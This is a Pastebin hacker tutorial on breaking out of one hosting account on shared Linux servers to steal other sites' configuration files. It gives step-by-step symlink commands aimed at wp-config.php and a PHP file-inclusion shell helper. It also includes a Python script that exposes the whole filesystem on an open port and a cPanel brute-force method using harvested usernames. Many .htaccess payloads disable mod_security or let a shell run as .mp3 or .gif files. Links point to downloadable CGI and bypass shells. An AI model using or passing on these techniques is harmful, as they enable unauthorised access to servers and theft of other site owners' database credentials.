API tools faq
paste
alsakib945

Linux Server Symlink Bypass

alsakib945
Oct 9th, 2020 (edited)
90
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.98 KB | None | 0 0
raw download clone embed print report
  1. Hello Every One Now I Aluf and I am going to share on Bypassing Symlink on Linux servers :)
  2.  
  3. Today i gonna Explain how to bypass Symlink on 2013 Server With Different .htaccess and Methods .
  4. So Lets Get Started :)
  5. Note : This method is not applicable for Godaddy , Bluehost , Hostgrator and Hostmonstor Servers .
  6. For This First You Need the Following Files :
  7. 1 -> Sen Haxor CGI Shell
  8. 2 -> sen.zip
  9. 3 -> passwd-bypass.php
  10. 4 -> Turbo Brute force Cpanel
  11. 5 - > Port.py
  12. First Before Starting to symlink we need to create php.ini and ini.php to Disable Safe mode and Disabled Functions on the server .
  13. Use the Following Code :
  14. Make a php.ini with the following code
  15. safe_mode=Off
  16. And ini.php with
  17. <?
  18. echo ini_get("safe_mode");
  19. echo ini_get("open_basedir");
  20. include($_GET["file"]);
  21. ini_restore("safe_mode");
  22. ini_restore("open_basedir");
  23. echo ini_get("safe_mode");
  24. echo ini_get("open_basedir");
  25. include($_GET["ss"]);
  26. ?>
  27. I will post the Download link of the files i use on the end of the tutorial .
  28. So after creating php.ini and ini.php upload the other files to the server .
  29. BYPASSING SYMLINK ON PLESK , DEBIAN , CENTOS & REDHAT SERVERS
  30. Now i will explain how to bypass symlink on Plesk , Debian , Centos and Redhat
  31. Commonly all of the above have root path like
  32. /root/var/www/vhost/
  33. where all sites will be under vhost directory . But you wont have permission to view it so we will create a symbolic link to root and view the site and symlink the config files
  34. Make a new directory in your shell example sen then upload sen.zip . Then use this command to unzip the file and create a symbolic link to root .
  35. Command : unzip sen.zip
  36. Note : In some servers unzip command wont work so you can manually create a symlink to root by using the command ln -s / root
  37. Then You will see this
  38. $ unzip sen.zip
  39. Archive: sen.zip
  40. linking: sen.txt -> /
  41. finishing deferred symbolic links:
  42. sen.txt -> /
  43. This means a symbolic link has been created to / root .
  44.  
  45. http://foto.pk/images/2rkr.jpg
  46. Now we need to upload .htaccess use the following
  47. Options all
  48. DirectoryIndex Sux.html
  49. AddType text/plain .php
  50. AddHandler server-parsed .php
  51. Done Bypassed Now View /var/www/vhost/ and you will be displayed with all sites .
  52.  
  53. http://foto.pk/images/3twt.jpg
  54. BYPASSING SYMLINK ON APACHE AND LITESPEED
  55. Mostly when you try to symlink apache in 2013 server you will face 403 forbidden or 404 not found and 500 Internel Server Error
  56. These can be Bypass By Using Different .htaccess individually.
  57. BYPASSING SYMLINK ON APACHE & LITESPEED - Linux Servers .
  58. First for this make a new directory in your shell example sen then upload sen.sa and .htaccess from the Sen Haxor CGI shell which i added the download link at the end of the Tutorial
  59. After uploading .htaccess and sen.sa to a new directory sen chmod sen.sa to 0755
  60. Then Open the Cgi Shell Login ( Password : senhaxor)
  61. Now there are several methods to bypass 403 forbidden You need to try all the following methods . Atleast one will give you success .
  62. Method 1 : .shtml method
  63. This is the commonly used method by most of the hackers to bypass 403 forbidden Error .
  64. So before we procced first you need to get all /etc/passwd from the server so that we can find the username and path of where the sites are located .
  65. 2013 Server mostly Many functions are enabled which shows 403 forbidden when you try to read cat /etc/passwd from the server
  66. so i made a Powerfull Shell which can bypass and get /etc/passwd from the server.
  67. I will also add it to the Downloads.
  68. Upload the /etc/passwd bypasser shell and get all /etc/passwd
  69. Then Login to Sen Haxor CGI Shell and create a symbolic link to your Target
  70. Step 1 : ln -s / root
  71. Step 2 : ln -s /home/username/public_html/config.php 1.shtml
  72. Example if our site is www.site.com and username is site and its Wordpress
  73. ln -s /home/site/public_html/wp-config.php 1.shtml
  74. So we created a Symbolic link to our Target now you need to Go to Your Shell and Edit the .htaccess with the following Code :
  75. Options +FollowSymlinks
  76. DirectoryIndex itti.html
  77. RemoveHandler .php
  78. AddType application/octet-stream .php
  79. Once you done this Open the 1.shtml on your Browser and rightclick and view source . You will be able to View the Config .
  80. This is the common way of Bypass 403 forbidden and Litespeed .
  81. Now Let Me Explain You the Advanced Method =)
  82. Method 2 : Bypassing Symlinked Config From Cpanel
  83. For This You need atleast One Cpanel Access on the sever . I will tell you how to easily crack Cpanel .
  84. First Run This Command : ls /var/mail
  85. Then you will be displayed with all username from the server Copy all .
  86. Now Upload Turbo Brute Force Cpanel Script ( i will attach it will the downloads).
  87. Open the Script and in User Paste all the username we got .
  88. And for Password here is the wordlist :
  89.  
  90. http://pastebin.com/4kAjMvdy
  91.  
  92. Copy All and Paste it on Password Select Simple and Click Submit
  93. If Your lucky you will be displayed with cracked cpanels.
  94. Once you got a cpanel on the server You can Bypass 500 Internel Server Error 403 Forbidden Error From Port :2077 and From error-pages from file manager.
  95. Just symlink the config
  96. ln -s /home/user/public_html/wp-config.php config.shtml
  97. Login to the cpanel
  98. Then Go to File Manager -> Error Pages
  99. Then Choose any of these according to what error is triggered when you open your symlinked config
  100. 400 (Bad request)
  101. 401 (Authorization required)
  102. 403 (Forbidden)
  103. 404 (Not found)
  104. 500 (Internal server error)
  105. Example "&file=400.shtml&desc=(Bad request)
  106. we can get the config by
  107. "&file=config.shtml& desc=(Bad request)
  108. BYPASS SYMLINK FROM PORT 2077
  109. So once you Symlinked the Config You can just login to port 2077
  110. Then public_html/path/config.shtml
  111. You will be able download the config.shtml and you can view the source .
  112. Method 3 : Symlink Bypass via Open Port using Python
  113. For this First we Python to be Installed on Server.
  114. To check if Python is installed run this command python -h
  115. If its install we can use the following python script and Bypass
  116. #!/usr/bin/env python
  117. # devilzc0de.org (c) 2012
  118. import SimpleHTTPServer
  119. import SocketServer
  120. import os
  121. port = 13123
  122. if __name__=='__main__':
  123. os.chdir('/')
  124. Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
  125. httpd = SocketServer.TCPServer(("", port), Handler)
  126. print("Now open this server on webbrowser at port : " + str(port))
  127. print("example: http://site.com :" + str(port))
  128. httpd.serve_forever()
  129. I have added the script to downloads .
  130. Now Upload the script to the shell
  131.  
  132. http://foto.pk/images/205cjg3.jpg
  133.  
  134. now run this command : python port.py
  135.  
  136. http://foto.pk/images/2je1wqq.jpg
  137.  
  138. Now Open the site with port 13123
  139. www.site.com:13123
  140.  
  141. http://foto.pk/images/j5ifwm.jpg
  142. Server Bypassed From Open Port .
  143. Method 4 : Bypassing Symlink Using .ini Method
  144. Login to Sen Haxor CGI shell normally create a symlink to your target in .ini Extension .
  145. ln -s /home/user/public_html/wp-config.php config.ini
  146. now go to the shell and make a new file a.shtml
  147. Paste the following code inside it and save it
  148. <!--#include virtual="config.ini"-->
  149. and save it .
  150. Now open the a.shtml in the browser and right click and view the source . Done Bypassed
  151. Method 5 : Bypassing Symlink Using ReadMe file
  152. Make a new directory in your shell From the Cgi shell normally symlink the config
  153. ln -s /home/user/public_html/config.php config.txt
  154. now make .htaccess with the following code .
  155. .htaccess
  156. Options All
  157. ReadMeName config.txt
  158. Now when you open the directory on the browser you will be displayed with the config source directly .
  159. eg : site.com/sen/config.txt is your symlinked config then when you open
  160. www.site.com/sen/ you symlinked config will be displayed as a ReadMe content .
  161. Thats it i have explain All the Methods to Bypass Symlink If you will have problem Bypassing Try all the Following .htaccess
  162. 1 - > .htaccess
  163. Options Indexes FollowSymLinks
  164. DirectoryIndex ssssss.htm
  165. AddType txt .php
  166. AddHandler txt .php
  167. 2 -> .htaccess
  168. Options All
  169. DirectoryIndex ssss.html
  170. addType txt .php
  171. AddHandler txt .php
  172. <IfModule mod_security.c>
  173. SecFilterEngine Off
  174. SecFilterScanPOST Off
  175. </IfModule>
  176. 3 -> .htaccess
  177. suPHP_ConfigPath /home/user/public_html/php.ini
  178. 4 -> .htaccess
  179. Options +FollowSymLinks
  180. DirectoryIndex Sux.html
  181. Options +Indexes
  182. AddType text/plain .php
  183. AddHandler server-parsed .php
  184. AddType text/plain .html
  185. 5 -> .htaccess
  186. Options Indexes FollowSymLinks
  187. DirectoryIndex ssssss.htm
  188. AddType txt .php
  189. AddHandler txt .php
  190. <IfModule mod_autoindex.c>
  191. IndexOptions
  192. FancyIndexing
  193. IconsAreLinks
  194. SuppressHTMLPreamble
  195. </ ifModule>
  196. <IfModule mod_security.c>
  197. SecFilterEngine Off
  198. SecFilterScanPOST Off
  199. </IfModule>
  200.  
  201. .HTACCESS TO BYPASS DISABLED FUNCTIONS
  202. This one is to make python work :
  203. .htaccess
  204. AddType
  205. application/x-httpd-cgi .py
  206. AddHandler cgi-script .py
  207. AddHandler cgi-script .py
  208.  
  209. This one is to make perl work :
  210.  
  211. .htaccess
  212. AddType application/x-httpd-cgi .pl
  213. AddHandler cgi-script .pl
  214. AddHandler cgi-script .pl
  215.  
  216. This one is to enable Symlink if the function is disabled in the server :
  217.  
  218. .htaccess
  219. <Directory "/home"> *** Options -ExecCGI* ***
  220. AllowOverride
  221. AuthConfig Indexes
  222. Limit FileInfo
  223. Options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
  224. </ Directory>
  225.  
  226. This one is to retrieve users permissions :
  227.  
  228. .htaccess
  229. AddType text/plain .php
  230. Options +Indexes
  231. DirectoryIndex filename.html
  232.  
  233. Bypass Internal Server error :
  234. .htaccess
  235. <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
  236.  
  237. Change php version:
  238. .htaccess
  239. AddType application/x-httpd-php4 .php
  240.  
  241. Bypass Uploads Options and upload shell in another extension :
  242.  
  243. <FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>
  244.  
  245.  
  246. Retrieve Config with picture method :
  247. .htaccess
  248. Options FollowSymLinks MultiViews Indexes ExecCGI
  249. AddType application/x-httpd-cgi .gif
  250. AddHandler cgi-script .gif
  251. AddHandler cgi-script .gif
  252. DOWNLOAD LINK OF THE SCRIPTS I HAVE USED ON THE TUTORIAL :
  253.  
  254. www.mediafire.com/download/08oeos9cpaloeum/Bypass_Symlink_on_2013_Server_With_Different_.htaccess_and_Methods_by_Sen_Haxor.rar
  255.  
  256.  
  257. @Aluf
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!